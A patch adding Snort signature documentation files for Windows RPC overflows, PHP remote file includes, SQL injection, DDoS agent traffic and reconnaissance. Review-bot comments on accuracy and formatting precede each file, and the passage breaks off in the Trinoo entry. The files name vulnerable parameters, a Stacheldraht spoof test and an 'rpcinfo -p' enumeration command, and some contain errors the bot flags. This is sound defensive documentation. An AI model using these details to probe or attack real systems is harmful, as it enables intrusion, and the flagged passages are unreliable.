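Review bot: "Additional References" at the end of the file is missing its colon, unlike every other file in this patch, and the Bugtraq entry under it is the only concrete pointer to the issue; since Detailed Information leaves the vulnerable "message exchanges" unspecified, the doc should at least say which eSignal service or port the rule watches so the alert can be scoped to hosts running that client. There is also trailing whitespace on the Summary, Detailed Information and Attack Scenarios lines and after "Simple." in Ease of Attack, plus a doubled blank line after the Sid value.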
--- /dev/null
+++ b/doc/signatures/2316.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+2316
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in the Microsoft Windows Workstation service.
+
+--
+Impact:
+Serious. Denial of Service (DoS), execution of arbitrary code is
+possible.
+
+--
+Detailed Information:
+Due to insufficient bounds checking in the Microsoft Windows Workstation
+service, it may be possible for an attacker to overwrite portions of
+memory. This can result in the attacker being presented with the
+opportunity to execute code of their choosing. Under some circumstances
+a Denial of Service condition may be possible against the target host.
+
+Specifically, the DCE/RPC service allows for overly long strings to be
+sent to the Workstation logging function. This logging function does not
+check parameters sufficiently which results in the buffer overflow
+condition.
+
+--
+Affected Systems:
+	Microsoft Windows 2000 Service Pack 2, Service Pack 3, Service Pack 4
+	Microsoft Windows XP, Microsoft Windows XP Service Pack 1
+	Microsoft Windows XP 64-Bit Edition
+
+--
+Attack Scenarios:
+The attacker may use one of the available exploits to target a
+vulnerable host.
+
+--
+Ease of Attack:
+Simple. Exploit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches and service packs.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+CERT:
+http://www.cert.org/advisories/CA-2003-28.html
+http://www.kb.cert.org/vuls/id/567620
+
+Microsoft:
+http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/MS03-049.asp
+
+--
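Review bot: "None known" under False Negatives is missing its period, and Attack Scenarios ("may use one of the available exploits") adds nothing beyond Ease of Attack. Detailed Information already explains that the overflow is an overly long string sent to the Workstation logging function over DCE/RPC, so Attack Scenarios could restate that concretely (an oversized request to the Workstation service RPC interface) and the two sections would no longer be redundant.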
--- /dev/null
+++ b/doc/signatures/2327.txt
@@ -0,0 +1,62 @@
+Rule:
+
+--
+Sid:
+2327
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in BulletScript MailList CGI mailing list manager running on a server.
+
+--
+Impact:
+Information gathering and possible theft of user information.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in BulletScript MailList CGI mailing list manager running on a server.
+The script bsml.pl does not perform stringent checks when processing
+input supplied via the action parameter to the script.
+
+It may be possible for an attacker to compromise the integrity of the
+database containing information pertaining to users of the mailing list
+being managed.
+
+--
+Affected Systems:
+	All systems running BulletScript MailList.
+
+--
+Attack Scenarios:
+An attacker can supply input of their choosing using the action
+parameter.
+
+--
+Ease of Attack:
+Simple. No exploit software required.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
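Review bot: the first two lines of Detailed Information repeat the Summary word for word; drop the repetition and open with the sentence about bsml.pl and the action parameter. Additional References is empty for a named product and script, so add the advisory or Bugtraq entry the rule was written from. Both copies of the line ending "exploit a known " also carry trailing whitespace.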
--- /dev/null
+++ b/doc/signatures/100000735.txt
@@ -0,0 +1,55 @@
+
+
+Rule:
+
+--
+Sid:
+100000735
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "Geeklog" application running on a webserver. Access to the file "MailAdmin.Action.class.php" using a remote file being passed as the "$_CONF[path]" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "$_CONF[path]" parameter in the "MailAdmin.Action.class.php" script used by the "Geeklog" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Geeklog
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
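Review bot: the third paragraph of Detailed Information and the whole Attack Scenarios section describe an attacker supplying credentials to an authentication mechanism, which is generic CGI boilerplate and does not describe a remote file include; for this rule the scenario is a request to MailAdmin.Action.class.php whose path parameter carries the URL of a file on an attacker-controlled host, so that file's code runs on the web server. Related: "$_CONF[path]" is the PHP variable name, not what appears on the wire; the HTTP parameter the rule would match is `_CONF[path]` without the dollar sign, and the Summary and Detailed Information should say so. "exploitation attempt has been attempted" in the Summary is redundant. Formatting: the file opens with two blank lines, and the "--" separators after the Sid value, after Affected Systems and after Contributors lack the blank line that precedes them elsewhere in the patch.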
--- /dev/null
+++ b/doc/signatures/111-10.txt
@@ -0,0 +1,60 @@
+Rule: 
+
+--
+Sid: 
+111-10
+
+-- 
+Summary: 
+This event is generated when the pre-processor stream4
+detects network traffic that may constitute an attack.
+
+-- 
+Impact: 
+This may indicate scanning activity.
+
+--
+Detailed Information:
+The pre-processor stream4 has detected network traffic that may indicate
+an Xmas Tree scan is in progress. That is, packets with the FIN, URG and
+PUSH flags set have been detected.
+
+In this case, indications are that the tool Nmap is in use.
+
+--
+Affected Systems:
+	All systems
+
+--
+Attack Scenarios: 
+An attacker may utilize scanning techniques to determine possible points
+of exploitation against a host.
+
+-- 
+Ease of Attack: 
+Simple. Many scanning tools exist.
+
+-- 
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+-- 
+Corrective Action:
+Check the target host for signs of compromise.
+
+Ensure the system is up to date with any appropriate vendor supplied patches.
+
+--
+Contributors:
+Martin Roesch <roesch@sourcefire.com>
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
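Review bot: Corrective Action ("Check the target host for signs of compromise") is weak for a reconnaissance event; before looking for compromise, the analyst should review which ports on the scanned host responded and whether those services need to be reachable from the scanning source, since that is what the scan was collecting. Style: many separators and the "Rule: " and "Sid: " labels carry trailing spaces, and "None Known" is capitalised differently from "None known" in most other files of the patch.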
--- /dev/null
+++ b/doc/signatures/224.txt
@@ -0,0 +1,57 @@
+Rule:
+
+--
+Sid:
+224
+
+--
+Summary:
+This traffic represents a Stacheldraht agent-to-handler communication to test whether or not the network on which the agent runs is allowed to send an outgoing packet with a spoofed source IP.
+
+--
+Impact:
+This event indicates that the Stacheldraht agent is running on a host on
+the monitored network.
+
+--
+Detailed Information:
+The Stacheldraht Distributed Denial of Service (DDoS) attack uses a tiered structure of compromised hosts to coordinate and participate in a denial of service attack.  There are "handler" hosts that are used to coordinate the attacks and "agent" hosts that launch the attack.  In order for an agent host to make a good participant in the distributed denial of service it must be able to spoof source IPs to elude detection.  After a host becomes an agent, a test is conducted such that an echo request packet with the source IP of 3.3.3.3 with an ICMP identification number of 666 can be sent to the handler host.
+
+--
+Affected Systems:
+Any compromised host.
+
+--
+Attack Scenarios:
+If a host has been compromised and become a Stacheldraht agent, the compromised host will be tested to see if it can spoof a source IP and making it an acceptable agent.
+
+
+--
+Ease of Attack:
+Simple. Stacheldraht code is available for use.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Use egress filtering in your network to prevent traffic leaving your network that is not part of the internal address space so that the Stacheldraht agent will be rejected for use in the DDoS.
+
+--
+Contributors:
+Original rule written by Max Vision <vision@whitehats.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Arachnids:
+http://www.whitehats.com/info/IDS193
+
+--
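Review bot: Corrective Action only covers egress filtering of spoofed packets, but Impact states the source host is already running a Stacheldraht agent, i.e. it is compromised; the doc should tell the analyst to isolate and investigate that host (and rebuild it), not merely to filter so that the handler rejects it as an agent. Wording: "can spoof a source IP and making it an acceptable agent" should read "and thus become an acceptable agent". There is also an extra blank line after Attack Scenarios.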
--- /dev/null
+++ b/doc/signatures/1316.txt
@@ -0,0 +1,64 @@
+Rule:  
+--
+Sid:
+
+1316
+
+--
+Summary:
+This rule indicates that a webpage was visited the included the content "fuck fuck fuck".
+
+--
+Impact:
+Someone could be violating your company's policy regarding the browsing of inappropriate content.
+
+--
+Detailed Information:
+
+This rule looks for a response from a webserver containing "fuck fuck fuck".
+
+--
+Affected Systems:
+
+All
+
+--
+Attack Scenarios:
+
+Not an attack.  
+
+--
+Ease of Attack:
+
+N/A.
+
+--
+False Positives:
+
+This could have been caused by a pop-up window or spam with an embedded link to a pornographic website.  This could also be caused by somebody visiting the snort rule descriptions on the snort website.
+
+--
+False Negatives:
+
+None known.
+--
+Corrective Action:
+
+Dependent on your company's policies.   
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Steven Alexander<alexander.s@mccd.edu>
+-- 
+Additional References:
+
+
+
+
+
+
+
+--
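Review bot: the Summary reads "a webpage was visited the included the content", which should be "that included the content". Formatting: the blank line after "Rule:" is missing while a stray blank line sits between "Sid:" and its value, False Negatives has no blank line before its separator, the separator before Additional References has a trailing space, the contributor line is missing a space before "<alexander.s@mccd.edu>", and seven blank lines sit between Additional References and the closing separator.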
--- /dev/null
+++ b/doc/signatures/599.txt
@@ -0,0 +1,61 @@
+Rule:
+
+--
+Sid:
+599
+
+--
+Summary:
+This event is generated when an attempt is made dump entries from the portmapper on a Solaris host.
+
+--
+Impact:
+Information disclosure.  This request can discover what Remote Procedure Call (RPC) services are offered and on which ports they listen. 
+
+--
+Detailed Information:
+The portmapper service registers all RPC services on UNIX hosts.  It can be queried for all RPC services running, the RPC program name and version, the protocol (TCP or UDP), and the port where the service listens.  This can provide an attacker with valuable information about what RPC services are offered and on which ports.
+
+--
+Affected Systems:
+All Solaris hosts running portmapper.
+
+--
+Attack Scenarios:
+An attacker can query the portmapper to discover RPC services and their associated listening ports. 
+
+--
+Ease of Attack:
+Simple. Execute 'rpcinfo -p hostname/IP'.  
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Limit remote access to RPC services.
+
+Filter RPC ports at the firewall to ensure access is denied to RPC-enabled machines.
+
+Disable unneeded RPC service.
+
+--
+Contributors:
+Original rule written by Max Vision <vision@whitehats.com>
+Modified by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Arachnids:
+http://www.whitehats.com/info/IDS429
+
+
+--
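Review bot: the Summary is missing "to" ("an attempt is made to dump entries"), and "Disable unneeded RPC service." in Corrective Action should be plural, matching the identical paragraph in the ypupdated entry earlier in this patch. There is also trailing whitespace on the Impact, Attack Scenarios and Ease of Attack lines and a doubled blank line before the closing separator.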
--- /dev/null
+++ b/doc/signatures/1415.txt
@@ -0,0 +1,76 @@
+Rule:
+
+--
+Sid:
+1415
+
+--
+
+Summary:
+This event is generated when an SNMP-Trap connection over UDP to a 
+broadcast address is made.
+
+--
+
+Impact:
+Information gathering
+
+--
+
+Detailed Information:
+The SNMP (Simple Network Management Protocol) Trap daemon usually 
+listens on port 161, tcp or udp.
+
+An attacker may attempt to send this request to determine if any devices
+are using SNMP.
+
+--
+
+Affected Systems:
+Devices running SNMP Trap daemons on well known ports.
+
+--
+
+Attack Scenarios:
+An attacker sends a packet directed to udp port 161, if sucessful a 
+reply is generated and the attacker may then launch further attacks 
+against the SNMP daemon on the responding IP addresses.
+
+--
+
+Ease of Attack:
+Simple.
+
+--
+
+False Positives:
+None known.
+
+--
+
+False Negatives:
+None known.
+
+--
+
+Corrective Action:
+Use a packet filtering firewall to protect devices using the SNMP 
+protocol and only allow connections from well-known hosts.
+
+--
+
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Chaos <c@aufbix.org>
+
+-- 
+
+Additional References:
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-0013
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-0012
+
+--
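Review bot: Detailed Information says the SNMP trap daemon "usually listens on port 161, tcp or udp", and Attack Scenarios repeats "udp port 161", but 161 is the SNMP agent port; trap receivers listen on UDP 162, which is what a broadcast trap rule is matching, so both should say 162 or the analyst will look on the wrong port. Attack Scenarios also assumes "a reply is generated"; SNMP traps are one-way notifications that the receiver does not acknowledge, so the reconnaissance value described there should be reworded (the attacker learns nothing from the trap itself) or removed. Typo: "sucessful".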
--- /dev/null
+++ b/doc/signatures/307.txt
@@ -0,0 +1,60 @@
+Rule:
+
+--
+Sid: 307
+
+--
+Summary:
+This event is generated when an attempt is made to exploit 
+vulnerable versions of the Chocoa IRC client.
+
+--
+Impact:
+Serious. System compromize presenting the attacker with the opportunity to execute arbitrary code on the client.
+
+--
+Detailed Information:
+It is possible for a malicious attacker to exploit a vulnerability in the Chocoa IRC client by setting an IRC channel topic specially designed to cause a buffer overflow.
+
+Affected Systems:
+	Fujitsu Chocoa 1.0 beta 7r for Windows 9x and NT.
+
+
+--
+Attack Scenarios:
+The attacker would need to set a specially crafted IRC channel topic to cause the overflow.
+
+Exploit scripts are available
+
+--
+Ease of Attack:
+Simple. Exploits are available.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <brian.caswell@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0672
+
+Bugtraq:
+http://www.securityfocus.com/bid/573
+
+--
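Review bot: the "--" separator between Detailed Information and Affected Systems is missing, so the two sections run together, and "Sid: 307" puts the value on the label line while every other file places it on its own line. Typos: "compromize" in Impact; "Exploit scripts are available" in Attack Scenarios needs a period and duplicates Ease of Attack. Brian Caswell's address here is brian.caswell@sourcefire.com while the rest of the patch uses bmc@sourcefire.com; confirm which is intended.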
--- /dev/null
+++ b/doc/signatures/3449.txt
@@ -0,0 +1,54 @@
+Rule:
+
+--
+Sid:
+3449
+
+--
+Summary:
+This rule does not generate an event. It is used in conjunction with
+other rules to reduce the possibility of false postives from occuring.
+
+--
+Impact:
+Unknown.
+
+--
+Detailed Information:
+This rule does not generate an event. It is used in conjunction with
+other rules to reduce the possibility of false postives from occuring.
+
+--
+Affected Systems:
+	NA
+
+--
+Attack Scenarios:
+NA
+
+--
+Ease of Attack:
+NA
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+NA
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
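Review bot: Detailed Information simply repeats the Summary, so the file says nothing about what this rule actually does; for a helper rule that only sets state for other rules, the doc should name the sids that depend on it and what state it sets, so an analyst understands why it exists, why it never alerts, and why it must stay enabled when those rules are. Typos in both copies: "postives", "occuring".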
--- /dev/null
+++ b/doc/signatures/100000394.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000394
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "Ovidentia" application running on a webserver. Access to the file "search.php" using a remote file being passed as the "babInstallPath" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "babInstallPath" parameter in the "search.php" script used by the "Ovidentia" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Ovidentia
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
+
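Review bot: same problem as the Geeklog entry (100000735.txt): the third paragraph of Detailed Information and the Attack Scenarios section are credential-validation boilerplate that does not describe a remote file include through the babInstallPath parameter of search.php; the scenario should be a request carrying the URL of a file on an attacker-controlled host in that parameter. "exploitation attempt has been attempted" in the Summary is redundant. The file also opens with two blank lines and ends with a stray one.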
--- /dev/null
+++ b/doc/signatures/2962.txt
@@ -0,0 +1,68 @@
+Rule:
+
+--
+Sid:
+2962
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in Microsoft Network Dynamic Data Exchange (NetDDE)
+services.
+
+--
+Impact:
+Serious. Execution of arbitrary code with system level privileges
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft NetDDE that may allow an attacker to
+run code of their choosing with system level privileges. A programming
+error in the handling of network messages may give an attacker the
+opportunity to overflow a fixed length buffer by using a specially
+crafted NetDDE message.
+
+This service is not started by default on Microsoft Windows systems, but
+this issue can also be exploited locally in an attempt to escalate
+privileges after a successful attack from an alternate vector.
+
+--
+Affected Systems:
+	Microsoft Windows NT, 2000, 2003, XP, 98 and ME systems.
+
+--
+Attack Scenarios:
+An attacker needs to craft a special NetDDE message in order to overflow
+the affected buffer.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+Disable the NetDDE service.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Microsoft Security Bulletin MS04-031:
+http://www.microsoft.com/technet/security/bulletin/ms04-031.mspx
+
+--
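Review bot: since Detailed Information says NetDDE is not started by default, Corrective Action should tell the analyst to first verify whether the service is actually running on the alerting host; a crafted message to a host where NetDDE is off cannot succeed, and that check decides whether the event is a near miss or a real hit. Minor: "Apply the appropriate vendor supplied patches" lacks a period.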
--- /dev/null
+++ b/doc/signatures/100000473.txt
@@ -0,0 +1,75 @@
+Rule:
+
+--
+Sid:
+100000473
+--
+Summary:
+This event is generated when an attempt is made to exploit an SQL injection 
+vulnerability in the "VBZoom" application running on a webserver. Access to the 
+file "language.php" with SQL commands being passed as the "Action" parameter 
+may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to inject SQL code from a 
+remote machine via the "Action" parameter in the "language.php" script used by 
+the "VBZoom" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to compromise the database backend for the 
+application, the attacker may also be able to execute system binaries or 
+malicious code of their choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using VBZoom
+--
+Attack Scenarios:
+An attacker can inject SQL commands to the backend database for an application 
+if user input is not correctly sanitized or checked before passing that input 
+to the database.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+SQL Injection Attack and Defense
+http://www.securitydocs.com/library/3587
+
+--
+
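Review bot: the third paragraph of Detailed Information ("validating the credentials of a client host...") is the generic CGI boilerplate and has nothing to do with SQL injection through the Action parameter; drop it, the second paragraph already covers the impact. The "--" separators after the Sid value, after Affected Systems and after Contributors are missing the blank line used elsewhere, most lines in the file carry a trailing space, and "exploitation attempt has been attempted" in the Summary is redundant.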
--- /dev/null
+++ b/doc/signatures/1994.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1994
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
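Review bot: this file is a verbatim copy of 1461.txt apart from the Sid, so it does not say which CGI application or request sid 1994 detects; add the script and request content the rule matches and the actual affected software in place of "All systems running CGI applications". Typos shared with that file: "running ona web server", "attackers choosing".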
--- /dev/null
+++ b/doc/signatures/1338.txt
@@ -0,0 +1,63 @@
+Rule:
+
+--
+Sid:
+1338
+
+--
+Summary:
+Attempted chown command access via web
+
+--
+Impact:
+Attempt to change file ownership permissions on a webserver.
+
+--
+Detailed Information:
+This is an attempt to change file ownership permissions on a machine.
+Using thiscommand an attacker may change the permissions of a file to
+suit his ownneeds, make a file owned by another user who would
+otherwise not havethese special permissions.
+
+--
+Attack Scenarios:
+The attacker can make a standard HTTP request that contains '/bin/chown'
+in the URI whichcan then change file permissions of files present on
+the host.Thiscommand may also be requested on a command line should
+the attacker gainaccess to the machine.
+
+--
+Ease of Attack:
+Simple HTTP request.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+
+Webservers should not be allowed to view or execute files and binaries
+outside of it'sdesignated web root or cgi-bin.Whenever possible,
+sensitive files andcertain areas of the filesystem should have the
+system immutable flagset to negate the use of the chown command. On
+BSD derived systems,setting the systems runtime securelevel also
+prevents the securelevelfrom being changed. (note: the securelevel can
+only beincreased)
+
+--
+Contributors:
+Sourcefire Research Team
+
+-- 
+Additional References:
+sid: 1336
+sid: 1337
+
+man chown
+
+--
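Review bot: words are run together throughout Detailed Information, Attack Scenarios and Corrective Action ("thiscommand", "ownneeds", "havethese", "whichcan", "host.Thiscommand", "gainaccess", "it'sdesignated", "cgi-bin.Whenever", "andcertain", "flagset", "systems,setting", "securelevelfrom", "beincreased"), which looks like line-wrap spaces lost on import; please reflow. The Affected Systems section present in every other file is missing here, and "it's" should be "its". Since the rule matches the string '/bin/chown' in a URI, False Positives should mention that legitimate URIs containing that path (documentation mirrors, source browsers) will trigger it, which is more likely than "None Known".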
--- /dev/null
+++ b/doc/signatures/3368.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3368
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
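Review bot: Additional References is empty although Corrective Action says to apply vendor patches and Ease of Attack says exploit code exists; add the Microsoft bulletin and CERT advisory for the RPC DCOM issue the way 2316.txt does, so the analyst can map the alert to the patch. Typo: "Expoit code exists". In Corrective Action the qualifier "from external sources" on the 135/139/445 block is important and should stay; blocking those ports between internal Windows hosts breaks domain and file-sharing traffic.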
--- /dev/null
+++ b/doc/signatures/2712.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2712
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure end_instantiation
+. This procedure is included in
+dbms_offline_og.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
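Review bot: The procedure name in Detailed Information is split across lines with a stray period, "vulnerability in the procedure end_instantiation / . This procedure is included in / dbms_offline_og.", which reads as a template field that was never joined; write it as one sentence naming the fully qualified procedure, dbms_offline_og.end_instantiation. Affected Systems lists "Oracle Oracle9i" (doubled vendor name) and no release or patch level, while Corrective Action says only "Apply the appropriate vendor supplied patch" and Additional References is empty; add the Oracle alert or CVE that covers this overflow so an administrator can check whether their patch set includes it. "Ease of Attack: Simple." is unsupported as written; either state that exploit code or a trigger is public, or qualify it.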
--- /dev/null
+++ b/doc/signatures/233.txt
@@ -0,0 +1,70 @@
+Rule:
+--
+Sid:
+233
+
+--
+Summary:
+This event is generated when a pong packet for the Trinoo (aka trin00) 
+DDos suite is detected.
+
+--
+Impact:
+This may indicate a compromised system or be the prelude to a
+Distributed Denial of Service (DDoS) attack.
+
+--
+Detailed Information:
+Once a Trinoo client has been installed on a compromised machine and a master is
+ready and listening, the master sends a "png" (ping) command to its drones in 
+an attempt to enumerate the drone network. A functioning client will respond to 
